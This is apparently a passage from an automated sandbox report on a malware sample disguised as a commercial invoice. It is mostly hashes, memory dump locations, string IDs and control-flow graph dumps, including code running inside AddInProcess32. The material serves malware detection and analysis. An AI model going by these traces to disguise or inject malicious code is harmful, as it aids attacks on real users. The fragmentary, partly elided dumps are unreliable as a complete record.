                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f50e9593e85577cb9ca14380464ae7bbfe2e90e8ebc8ce5f3f0617bbd3f705d
                                              • Instruction ID: 18d805fcf2828551a0eb72ab589d4f3e881c8c6943064c5432a1d7177917ed26
                                              • Opcode Fuzzy Hash: 8f50e9593e85577cb9ca14380464ae7bbfe2e90e8ebc8ce5f3f0617bbd3f705d
                                              • Instruction Fuzzy Hash: A7F0ECA181D7844ED791EB38845D3957ED0AB16218FA800FEC448CF193E6AA44478752
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3f080e4a5a546933f0a4cefa7ac1bef7ac693cdabcf1e99db13bf353afc678c
                                              • Instruction ID: 99cdceb5e1d37f9caa2ad8fbd9c94c76157ba98c6d9c0ce58094ac901691f893
                                              • Opcode Fuzzy Hash: c3f080e4a5a546933f0a4cefa7ac1bef7ac693cdabcf1e99db13bf353afc678c
                                              • Instruction Fuzzy Hash: 28D01221D2CE194FEBB8BA7850452A5A1E0FF18320F800A79D05AC3589DFA8A9958380
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fef51e4c035b13918cbf85215974752d952bd057d47d37a911fea096d66dad1e
                                              • Instruction ID: ef30edf7900b720d6162a3fcc2986427706aa2aba9894e7dc8ac3efdcdb824aa
                                              • Opcode Fuzzy Hash: fef51e4c035b13918cbf85215974752d952bd057d47d37a911fea096d66dad1e
                                              • Instruction Fuzzy Hash: 75E01A30A0462C8EDF60EB48CC41BE9B3B1FB84310F0041E5D44DE3251CB306A84CF42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 318e5b51855e2e82674233094c6bb4949ac6ac620057b5b743e8686707491224
                                              • Instruction ID: 9a6f2bf55840521663b3644a6a741d2ae7621078e5d2613ced167132f0c207f6
                                              • Opcode Fuzzy Hash: 318e5b51855e2e82674233094c6bb4949ac6ac620057b5b743e8686707491224
                                              • Instruction Fuzzy Hash:
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 50c38656825e2a5ad063a450d2f274d68efd81d768bbef3ae3ea48df4dc07d54
                                              • Instruction ID: 462b9d2f4556b774591b3fbaa757aea38780a454aa43259c1247c25ac7314316
                                              • Opcode Fuzzy Hash: 50c38656825e2a5ad063a450d2f274d68efd81d768bbef3ae3ea48df4dc07d54
                                              • Instruction Fuzzy Hash:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: KK_H
                                              • API String ID: 0-1421535800
                                              • Opcode ID: ebabb6361e130f76b69f1a4a6b9ae6763a66cf041b4261244eb1635e8d136ad4
                                              • Instruction ID: 0fde247db5d1ddfd0abc1c0b06380592f0aae93381b214e49d30da4c5afa9bf3
                                              • Opcode Fuzzy Hash: ebabb6361e130f76b69f1a4a6b9ae6763a66cf041b4261244eb1635e8d136ad4
                                              • Instruction Fuzzy Hash: CE222331A0CE0A4FE759EB2CE8516B5F7D1FF89331B5442BAD44AC3292DE64F8528790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^J$M_^T$M_^^$M_^_$M_^`$M_^i
                                              • API String ID: 0-1093707961
                                              • Opcode ID: 512e40a256bd3c179b0ad83a0be9dbef95e8215b4a72299d8547041cc2876015
                                              • Instruction ID: 3e3e016f864800fb7aadbea61fe9cf4b3b70d25c10442d52693e87962d877e49
                                              • Opcode Fuzzy Hash: 512e40a256bd3c179b0ad83a0be9dbef95e8215b4a72299d8547041cc2876015
                                              • Instruction Fuzzy Hash: 592123B36092248BD7127A9D7C952D9BB90DF923B638903F3C298CF183FD14748686D5

                                              Execution Graph

                                              Execution Coverage:8.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:11
                                              Total number of Limit Nodes:2
                                              execution_graph 11944 65b2f68 11945 65b3270 11944->11945 11946 65b2f90 11944->11946 11947 65b2f99 11946->11947 11950 65b23e4 11946->11950 11949 65b2fbc 11949->11949 11951 65b23ef 11950->11951 11953 65b32b3 11951->11953 11954 65b2400 11951->11954 11953->11949 11955 65b32e8 OleInitialize 11954->11955 11956 65b334c 11955->11956 11956->11953
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33bcf733d5e81a620037afd46ec5f45d786ada08ea292ae50326e3f61afbecb9
                                              • Instruction ID: 1238ecb41ae4b7cc15676cfd135e0980c9bf1c26f52a5bd8744de8e1062bfa70
                                              • Opcode Fuzzy Hash: 33bcf733d5e81a620037afd46ec5f45d786ada08ea292ae50326e3f61afbecb9
                                              • Instruction Fuzzy Hash: A1331C31D10B198EDB11EF68C8946ADF7B1FF99300F15C69AE458A7211EB70EAC5CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 542 2b33e38-2b33e9e 544 2b33ea0-2b33eab 542->544 545 2b33ee8-2b33eea 542->545 544->545 546 2b33ead-2b33eb9 544->546 547 2b33eec-2b33f44 545->547 548 2b33ebb-2b33ec5 546->548 549 2b33edc-2b33ee6 546->549 556 2b33f46-2b33f51 547->556 557 2b33f8e-2b33f90 547->557 550 2b33ec7 548->550 551 2b33ec9-2b33ed8 548->551 549->547 550->551 551->551 553 2b33eda 551->553 553->549 556->557 558 2b33f53-2b33f5f 556->558 559 2b33f92-2b33faa 557->559 560 2b33f82-2b33f8c 558->560 561 2b33f61-2b33f6b 558->561 566 2b33ff4-2b33ff6 559->566 567 2b33fac-2b33fb7 559->567 560->559 562 2b33f6f-2b33f7e 561->562 563 2b33f6d 561->563 562->562 565 2b33f80 562->565 563->562 565->560 568 2b33ff8-2b34046 566->568 567->566 569 2b33fb9-2b33fc5 567->569 577 2b3404c-2b3405a 568->577 570 2b33fc7-2b33fd1 569->570 571 2b33fe8-2b33ff2 569->571 573 2b33fd3 570->573 574 2b33fd5-2b33fe4 570->574 571->568 573->574 574->574 575 2b33fe6 574->575 575->571 578 2b34063-2b340c3 577->578 579 2b3405c-2b34062 577->579 586 2b340d3-2b340d7 578->586 587 2b340c5-2b340c9 578->587 579->578 589 2b340e7-2b340eb 586->589 590 2b340d9-2b340dd 586->590 587->586 588 2b340cb 587->588 588->586 592 2b340fb-2b340ff 589->592 593 2b340ed-2b340f1 589->593 590->589 591 2b340df-2b340e2 call 2b30ab8 590->591 591->589 594 2b34101-2b34105 592->594 595 2b3410f-2b34113 592->595 593->592 597 2b340f3-2b340f6 call 2b30ab8 593->597 594->595 598 2b34107-2b3410a call 2b30ab8 594->598 599 2b34123-2b34127 595->599 600 2b34115-2b34119 595->600 597->592 598->595 604 2b34137 599->604 605 2b34129-2b3412d 599->605 600->599 603 2b3411b 600->603 603->599 607 2b34138 604->607 605->604 606 2b3412f 605->606 606->604 607->607
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V|m
                                              • API String ID: 0-2015827483
                                              • Opcode ID: b4b63c0d77d95c4853c1276c4634f0bfdfe8ca863e6a429bfb03a958acc23df7
                                              • Instruction ID: 7fda03200c22ab0bb23b26c052afcafcc43d599c7294f5f5267d7cb151ac86e6
                                              • Opcode Fuzzy Hash: b4b63c0d77d95c4853c1276c4634f0bfdfe8ca863e6a429bfb03a958acc23df7
                                              • Instruction Fuzzy Hash: 95916A70E002499FDB11CFA9D9817AEBBF2EF88314F148169E405E7294DB749885CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 674 2b39d02-2b39d43 677 2b39d45-2b39d5e 674->677 678 2b39d6c-2b39d6f 674->678 681 2b39d67 677->681 679 2b39d71-2b39d83 678->679 680 2b39d88-2b39d8b 678->680 679->680 682 2b39ed2-2b39ed5 680->682 683 2b39d91-2b39ecd call 2b39b10 680->683 681->678 685 2b39ed7-2b39edc 682->685 686 2b39edf-2b39ee2 682->686 683->682 685->686 687 2b3a16a-2b3a16d 686->687 688 2b39ee8-2b39f0b 686->688 690 2b3a173-2b3a205 687->690 691 2b3a20a-2b3a20d 687->691 692 2b39f11-2b39fcb 688->692 693 2b3cc67-2b3cc95 688->693 690->691 694 2b3a213-2b3a2a5 691->694 695 2b3a2aa-2b3a2ad 691->695 692->693 715 2b39fd1-2b3a043 692->715 704 2b3cc97-2b3cc9a 693->704 694->695 698 2b3a2e4-2b3a2e7 695->698 699 2b3a2af-2b3a2d1 695->699 705 2b3a4a3-2b3a4a6 698->705 706 2b3a2ed-2b3a2fe 698->706 699->693 721 2b3a2d7-2b3a2df 699->721 712 2b3cca2-2b3cca5 704->712 713 2b3cc9c-2b3cca1 704->713 708 2b3a5ea-2b3a5ed 705->708 709 2b3a4ac-2b3a4bd 705->709 706->693 714 2b3a304-2b3a3ea 706->714 716 2b3a5f3-2b3a685 708->716 717 2b3a68a-2b3a68d 708->717 709->693 720 2b3a4c3-2b3a5ba 709->720 722 2b3cca7-2b3ccad 712->722 723 2b3ccef-2b3ccf1 712->723 714->693 766 2b3a3f0-2b3a473 714->766 715->693 761 2b3a049-2b3a0bb 715->761 716->717 726 2b3a6a0-2b3a6a3 717->726 727 2b3a68f-2b3a69b 717->727 720->693 782 2b3a5c0-2b3a5e5 720->782 721->698 729 2b3ccd5-2b3ccdc 722->729 730 2b3ccaf-2b3ccb4 722->730 723->704 725 2b3ccf3-2b3ccf8 723->725 725->704 740 2b3a6b6-2b3a6b9 726->740 741 2b3a6a5-2b3a6b1 726->741 727->726 732 2b3ccff-2b3cd07 729->732 733 2b3ccde-2b3cce7 729->733 730->723 745 2b3ccb6-2b3ccbc 733->745 746 2b3cce9-2b3ccee 733->746 742 2b3a732-2b3a735 740->742 743 2b3a6bb-2b3a6c7 740->743 741->740 752 2b3a737-2b3a749 742->752 753 2b3a74e-2b3a751 742->753 743->693 751 2b3a6cd-2b3a72d 743->751 749 2b3cd08-2b3cd3b 745->749 750 2b3ccbe-2b3cccd 745->750 774 2b3cd3d-2b3cd40 749->774 758 2b3ccfa-2b3ccfd 750->758 759 2b3cccf-2b3ccd4 750->759 751->742 752->753 762 2b3a757-2b3a7e3 753->762 763 2b3a7ee-2b3a7fa 753->763 758->732 758->733 761->693 789 2b3a0c1-2b3a145 761->789 762->716 799 2b3a7e9 762->799 766->693 815 2b3a479-2b3a49e 766->815 777 2b3cd42-2b3cd4d 774->777 778 2b3cd50-2b3cd53 774->778 779 2b3cd55-2b3cd58 778->779 780 2b3cd99-2b3cd9c 778->780 784 2b3cd5e-2b3cd67 779->784 785 2b3ce0c-2b3ce0f 779->785 786 2b3cdb8-2b3cdbb 780->786 787 2b3cd9e-2b3cdb1 780->787 782->708 791 2b3cf56-2b3cf93 784->791 792 2b3cd6d-2b3cd7c 784->792 793 2b3ce11 785->793 794 2b3ce18-2b3ce2f 785->794 796 2b3cdd4-2b3cdd7 786->796 797 2b3cdbd-2b3cdcf 786->797 787->779 795 2b3cdb3 787->795 789->693 835 2b3a14b-2b3a165 call 2b39b10 789->835 792->791 800 2b3cd82-2b3cd96 792->800 793->794 801 2b3ce31-2b3ce3d 794->801 802 2b3ce60-2b3ce63 794->802 795->786 804 2b3cdd9-2b3cdda 796->804 805 2b3cddf-2b3cde2 796->805 797->796 799->763 801->791 810 2b3ce43-2b3ce4f 801->810 813 2b3cf42-2b3cf53 802->813 814 2b3ce69-2b3ce6e 802->814 804->805 807 2b3cde4-2b3cde9 805->807 808 2b3cdec-2b3cdef 805->808 807->808 817 2b3cdf1-2b3cdf5 808->817 818 2b3cdfa-2b3cdfc 808->818 810->791 820 2b3ce55-2b3ce59 810->820 821 2b3ce70-2b3ce79 814->821 822 2b3ceeb-2b3ceef 814->822 815->705 817->818 825 2b3ce03-2b3ce06 818->825 826 2b3cdfe 818->826 820->802 821->791 828 2b3ce7f-2b3ceaa 821->828 823 2b3cef1-2b3cefa 822->823 824 2b3cf39-2b3cf3c 822->824 823->791 832 2b3cefc-2b3cf31 823->832 824->813 824->814 825->774 825->785 826->825 828->791 830 2b3ceb0-2b3ced4 828->830 830->791 833 2b3ceda-2b3cee9 830->833 832->791 836 2b3cf33-2b3cf35 832->836 833->824 835->687 836->824
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4b0b7e25fde2129176aeb68cc3f21177325b8e371ba1af3fecb0eae05009de9
                                              • Instruction ID: be95ed4b8415a432fe4962c7751f7b357b00a30daa14ac88e198a327638bd87d
                                              • Opcode Fuzzy Hash: e4b0b7e25fde2129176aeb68cc3f21177325b8e371ba1af3fecb0eae05009de9
                                              • Instruction Fuzzy Hash: B4620C31D1071A8EDB11EF68C980AA9F7B1FF99300F55D6DAD44867221EB70AAD4CF81

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b34a50, calls 2b30ab8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c74cacdedaccfe5fe8579b6df320a058209fce61875360a96bb821508cd82f9
                                              • Instruction ID: 6f305d3239c94c5349ce4cdc955e3921f11ccc5d4b54db624a23853fa862c60e
                                              • Opcode Fuzzy Hash: 5c74cacdedaccfe5fe8579b6df320a058209fce61875360a96bb821508cd82f9
                                              • Instruction Fuzzy Hash: CDB14874E00209DFDB11CFA9D8817EEBBF2EF88314F148569D815AB294EB749885CF91

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b347c8, calls 2b30ab8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V|m$\V|m
                                              • API String ID: 0-329693845
                                              • Opcode ID: 981c83d32e7a6b21ab59322fbf96fa8f994bf3d25f69ed2494d25f38fb27dc3a
                                              • Instruction ID: caaaef1e9c164af0f3195c6a12932294683977c7c5da8288c1c2698f8a61328b
                                              • Opcode Fuzzy Hash: 981c83d32e7a6b21ab59322fbf96fa8f994bf3d25f69ed2494d25f38fb27dc3a
                                              • Instruction Fuzzy Hash: DC715870E00249DFDB11DFA9D881BAEBBF2FF88314F148169E415A7254EB749882CF91

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b347bc, calls 2b30ab8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V|m$\V|m
                                              • API String ID: 0-329693845
                                              • Opcode ID: 34f69b7cdbf039f3e6e967b2874b0bc11c4191e68ab615632208d425b8a8eaab
                                              • Instruction ID: 778701ea896ec7cebb68b77a85a27e3ec587848b67964f783d63e8d62a3aad3c
                                              • Opcode Fuzzy Hash: 34f69b7cdbf039f3e6e967b2874b0bc11c4191e68ab615632208d425b8a8eaab
                                              • Instruction Fuzzy Hash: DD713670E002899FDB21CFA9D885BDEBBB2FF88314F148169D415A7254DB749886CF91

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 65b2400, calls OleInitialize
                                              APIs
                                              • OleInitialize.OLE32(00000000), ref: 065B333D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2469856439.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_65b0000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
                                              • Opcode ID: 771aa8a8f2d9c3728c21e86e0eb7077638bd934a89ff8f0684f262b1f293fd82
                                              • Instruction ID: ca37558e045f1fbc550205f25c5627df363d240d2f5b6e6635e18b7b9501363c
                                              • Opcode Fuzzy Hash: 771aa8a8f2d9c3728c21e86e0eb7077638bd934a89ff8f0684f262b1f293fd82
                                              • Instruction Fuzzy Hash: 751112B59003488FDB20DF9AD849BDEFBF4EB48224F20845AE519A7300D779A945CFA5

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 65b32e0, calls OleInitialize
                                              APIs
                                              • OleInitialize.OLE32(00000000), ref: 065B333D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2469856439.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_65b0000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
                                              • Opcode ID: 7bc044e317537c67bfc9c7e09fdb7ddc1d1ab64831420745c6492836ce7403d5
                                              • Instruction ID: 17a7466789a9d0180b1b44a5f06613f06e7f5f458b533a96e8ab94b05ddc3411
                                              • Opcode Fuzzy Hash: 7bc044e317537c67bfc9c7e09fdb7ddc1d1ab64831420745c6492836ce7403d5
                                              • Instruction Fuzzy Hash: F81112B58007498FCB20DFAAD885BCEFBF4EB48324F24845AD519A7300D779A945CFA5

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b33e2d, calls 2b30ab8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V|m
                                              • API String ID: 0-2015827483
                                              • Opcode ID: bd002e4c24e9efdb1ce64b12d3911122404961f46467943f3594f8597c06e407
                                              • Instruction ID: c9e5254107d6b165257481570c051816b874c129b191c726fee580f7f3eac70f
                                              • Opcode Fuzzy Hash: bd002e4c24e9efdb1ce64b12d3911122404961f46467943f3594f8597c06e407
                                              • Instruction Fuzzy Hash: 9B915870E002499FDB21CFA9D9857EEBBF2EF88314F148169E414A7294DB749886CF91

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b378f0, calls 2b391eb, 2b39138, 2b39148
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cfa23197b83ede2bccde60e282606c6378289710f1ae36a1d680c3346079cc3
                                              • Instruction ID: 06c0af6e70d43b2b28ff5eec0785a3abcdd41e97676bc85172b511331b31a9f3
                                              • Opcode Fuzzy Hash: 9cfa23197b83ede2bccde60e282606c6378289710f1ae36a1d680c3346079cc3
                                              • Instruction Fuzzy Hash: 6D129170310206CFDB2AAB28E595B7873A7FB89254F505A29E101CF744DF75DC8ACB91
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f1f4580df35daccb765450f91ea605984b0f1cfb94257d677b3d860a823f1fd
                                              • Instruction ID: 64ebf7d2552cf6ab4b332e18fa38e292028f24509e39cf16e58dce399d312276
                                              • Opcode Fuzzy Hash: 2f1f4580df35daccb765450f91ea605984b0f1cfb94257d677b3d860a823f1fd
                                              • Instruction Fuzzy Hash: F1D12A35A006048FDB26DF68D594BADBBB2FF88310F2485A9E416EB395DB75DC81CB40

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b396c8, calls 2b39676, 2b396c8, 2b39478, 2b3934c, 2b30368
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c958b42ba34abbefd77f7d0dd7d0adc50bc25b5960b0a139cde6329a84dd9ee8
                                              • Instruction ID: 4b4271bf3796ee469393e8358a8bd83acf110803ded5b9f1fe7e7af93535d36f
                                              • Opcode Fuzzy Hash: c958b42ba34abbefd77f7d0dd7d0adc50bc25b5960b0a139cde6329a84dd9ee8
                                              • Instruction Fuzzy Hash: A7C19F75B006058FDB15DF68D8807AEBBB2FF88310F2085A9E519DB395DB74D845CB80

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b34a45, calls 2b30ab8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 872716e238f5bc507683bbc2f9a5b1139dea07cecd95f82205d8a396ee76d16b
                                              • Instruction ID: 5156ac76a9ba82190ac2d3cb71b328fa2021f4f0ca549e8cd04923aac72c782e
                                              • Opcode Fuzzy Hash: 872716e238f5bc507683bbc2f9a5b1139dea07cecd95f82205d8a396ee76d16b
                                              • Instruction Fuzzy Hash: 2EA15774E00209CFDB11CFA9D8817EEBBF2EF88314F148569D815AB294EB749885CF91

                                              Control-flow Graph

                                              • Control-flow graph rendering (executed / not executed blocks) not preserved; basic blocks starting at 2b36e92, calls 2b36bf8, 2b36334, 2b378f0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04db8a5ec5f71c3cbc05210c4bcea3d402cd7e3cce6177716ed88a16e34cf826
                                              • Instruction ID: 0e6f34ec126da1d9c086bd845de2a18dac3731b4317b6cd67ed48ffdf92e3149
                                              • Opcode Fuzzy Hash: 04db8a5ec5f71c3cbc05210c4bcea3d402cd7e3cce6177716ed88a16e34cf826
                                              • Instruction Fuzzy Hash: 5051B271E00249AFDB16DB78C4547AEBBB6FF85300F2084AAE405EB390EB759C45CB51

                                              Control-flow Graph: function starting at 2b36c96 (rendered basic-block graph omitted; executed/not-executed legend and raw node/edge dump not reproduced)
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15684f163c84ba8a12ca03b5cd24331027564321ef15a7ee6015e508be7dd933
                                              • Instruction ID: 65c4d1c77157ddb518c040694af7fb33d95eeb02ffbd12e66a2095e26f235694
                                              • Opcode Fuzzy Hash: 15684f163c84ba8a12ca03b5cd24331027564321ef15a7ee6015e508be7dd933
                                              • Instruction Fuzzy Hash: 235103B4D002189FDB15CFAAD889B9DBBF5FF48304F14816AE815AB350DB749844CF99

                                              Control-flow Graph: function starting at 2b36ca0 (rendered basic-block graph omitted; executed/not-executed legend and raw node/edge dump not reproduced)
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f182c9a1d2efa4a86a2a853f7258d338d4df9b6641ddc3815e3b6f59838d139
                                              • Instruction ID: 015f4f3c615a88868ccbd5f7ea1f2785bd5d0eab65d4fe28642a30c0e8d9904c
                                              • Opcode Fuzzy Hash: 5f182c9a1d2efa4a86a2a853f7258d338d4df9b6641ddc3815e3b6f59838d139
                                              • Instruction Fuzzy Hash: 63511470D002189FDB15CFAAD889B9DBBF5FF48304F14856AD815AB350DB74A844CF99
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a91c12ecb99c9bf1b00b00372869d7e90bf473e89a7f851194fff7690c8d2f6
                                              • Instruction ID: 973448ba5e83fdd0a3b96c74f4bcc01d6d192e8bb0548107bb5b2e2f5eceb239
                                              • Opcode Fuzzy Hash: 2a91c12ecb99c9bf1b00b00372869d7e90bf473e89a7f851194fff7690c8d2f6
                                              • Instruction Fuzzy Hash: F331FF30B002058FDB2AAF7485547BE7BA2FF89650F1445A9D406EB755EF39CC82CB90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5566c530424abb65ea268265f1875078175dad6a9b68edd293ee834853b28f0f
                                              • Instruction ID: 2d9d3d3474aa6dfa85172f30f0c90f1c162ba1e5e5c33a340facabd090b55e01
                                              • Opcode Fuzzy Hash: 5566c530424abb65ea268265f1875078175dad6a9b68edd293ee834853b28f0f
                                              • Instruction Fuzzy Hash: 8C412C785122418FDB1BFF28FAC0E543BB2E79930C700A579D1445FA2EEBA56A85CF41
                                              Memory Dump Source
